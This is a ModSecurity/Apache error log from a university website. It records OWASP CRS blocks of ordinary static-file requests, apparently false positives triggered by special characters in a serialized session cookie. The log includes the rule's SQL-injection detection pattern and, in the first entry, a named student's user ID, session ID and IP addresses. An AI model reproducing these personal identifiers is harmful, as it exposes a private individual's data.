[Mon Aug 28 23:57:05.253083 2023] [:error] [pid 55742] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzR4cCo-f0AANm@U7YAAAAJ"]
[Mon Aug 28 23:57:23.177584 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOzR88Co-f0AANpfcXwAAAAF"]
[Mon Aug 28 23:57:23.194699 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOzR88Co-f0AANnDyQkAAAAD"]
[Mon Aug 28 23:57:23.198443 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOzR88Co-f0AANpfcX0AAAAF"]
[Mon Aug 28 23:57:23.199671 2023] [:error] [pid 55904] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOzR88Co-f0AANpg7HIAAAAH"]
[Mon Aug 28 23:57:23.200584 2023] [:error] [pid 55742] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOzR88Co-f0AANm@U8EAAAAJ"]
[Mon Aug 28 23:57:23.200698 2023] [:error] [pid 55745] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOzR88Co-f0AANnBglcAAAAK"]
[Mon Aug 28 23:57:23.203055 2023] [:error] [pid 55902] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOzR88Co-f0AANpel@MAAAAC"]
[Mon Aug 28 23:57:23.210570 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOzR88Co-f0AANnDyQoAAAAD"]
[Mon Aug 28 23:57:23.213288 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOzR88Co-f0AANpfcX4AAAAF"]
[Mon Aug 28 23:57:23.217541 2023] [:error] [pid 55904] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOzR88Co-f0AANpg7HMAAAAH"]
[Mon Aug 28 23:57:23.218650 2023] [:error] [pid 55745] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOzR88Co-f0AANnBglgAAAAK"]
[Mon Aug 28 23:57:23.227396 2023] [:error] [pid 55742] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOzR88Co-f0AANm@U8IAAAAJ"]
[Mon Aug 28 23:57:23.252751 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOzR88Co-f0AANpfcX8AAAAF"]
[Mon Aug 28 23:57:23.271647 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOzR88Co-f0AANpfcYAAAAAF"]
[Mon Aug 28 23:57:23.289183 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOzR88Co-f0AANpfcYEAAAAF"]
[Mon Aug 28 23:57:23.320112 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOzR88Co-f0AANpfcYIAAAAF"]
[Mon Aug 28 23:57:23.321340 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOzR88Co-f0AANnDyQsAAAAD"]
[Mon Aug 28 23:57:23.369377 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOzR88Co-f0AANnDyQwAAAAD"]
